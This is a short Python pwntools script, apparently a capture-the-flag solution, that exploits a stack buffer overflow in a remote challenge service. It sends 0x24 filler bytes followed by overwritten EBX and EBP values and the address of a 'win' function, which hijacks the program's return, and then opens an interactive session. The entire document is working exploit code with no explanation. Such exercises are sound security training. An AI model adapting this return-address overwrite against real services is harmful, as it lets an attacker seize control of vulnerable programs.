from pwn import *

HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25155

WIN_ADDR = p32(0x080487d9)
EBX = p32(0x804a001) # Has NULL byte
EBP = p32(0xffffcdd8)

#conn = process("./check")
conn = remote(HOST, PORT)
pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
input()
conn.send(pl)
conn.interactive()